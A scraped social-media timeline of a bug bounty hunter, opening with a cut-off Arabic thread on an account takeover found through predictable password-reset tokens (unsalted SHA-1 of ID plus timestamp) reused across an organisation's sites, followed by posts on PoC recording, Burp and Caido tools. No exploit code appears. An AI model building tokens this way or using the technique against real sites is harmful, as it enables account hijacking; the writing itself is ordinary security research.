بشكل كامل , والي كانت من خلال ال reset password function # From Source Code Review to 0-Click ATO & 15+ Critical Bugs Uncovered لاحظت انه يتم انشاء token في حال انك تبي تسوي reset password لكن التوكن كان يتم انشائه بالطريقة هذي الي قاعد يصير بكل اختصار ياخذ الهوية والوقت الحالي (timestamp) ويسوي له hashing باستعمال SHA1 وبما ان ال SHA-1 مافيها اي secret key, salting ابدا معناته انه من الممكن نجيب اي reset token فسويت سكربت بكل سهولة يستغل العملية هذي, وقدرت اني اتحكم بأي حساب مسجل بالجهة من خلال رقم الهوية فقط. حلو وموضوع ال pivoting عمر ؟ هنا ارجع لكم بال pivoting بس على نطاق ال web application, الجهة نفسة كان عنده عدة مواقع اخرى فجربت اني شوف نفس المفهوم للمواقع الثانية التابعة للجهة, وفعلاً نفس المنطق مستخدم، فاستغليتهم بنفس الطريقة. ومن خلال الـ source code review قدرت اكتشف ثغرات عديدة اخرى كذلك من خلال ال pivoting كنت قادر اكتشف فوق ال 15+ ثغره حرجة ومرتفعة الخطورة, وممكن تكون بجزء ثاني بالختام، أتمنى كان شرحي واضح واستفدتوا، وشكرًا على وقتكم وقراءتكم.
1
12
1,177
I will not use Bandicam anymore! I am working on a tool for quick Proof of Concept (PoC) screen recording, similar to the one on HackerOne, but with some changes. #BugBounty 👇
2
13
2,051
Replying to @h4x0r_dz
That guy is asking us to resubscribe to @ChatGPTapp again 😂
1
13
852
While writing this Burp Suite Bambda specifically the opcodes, I initially left it incomplete, feeling that no one would use it. However, I was surprised by the positive feedback and the memes people shared on Telegram, which really motivated me to continue. I may consider targeting a different architecture in the future since PowerPC is less common compared to others , This makes it possible to not only analyze malware's web traffic but also to read and understand its binary instructions. Attached are some memes created by bug bounty hunters on Telegram.
Just extended Burp Suite beyond its traditional use by making it capable of disassembling and analyzing PlayStation 3 games ELF files with my first Bambad script, targeting the PowerISA-Altivec-64-32addr architecture! This could make Burp Suite more powerful for looking inside binaries, not just network traffic! #bugbounty #BurpSuite #PS3 #Bambdas
1
13
1,576
6/ 📢 If you've discovered a bug 🐞, have ideas for improvement 💡, or want to suggest new features, don't hesitate to reach out. Your input helps shape BugBounty.zip, making it the best it can be for the community. Let's collaborate! github.com/BugBountyzip/bugb… 🤝 (6/6)
1
2
11
1,935
Replying to @securibee
Gwhwj466jwhwj.txt JajH47hwhio.txt Ahajh7177.txt
2
11
397
Now available 🔥
🛡️✨ Another addition to the Caido Store! Introducing "CSRF PoC Generator" by @Tur24Tur. Generate various types of CSRF PoC payloads from requests. Check it out: github.com/BugBountyzip/Caid…
1
12
1,144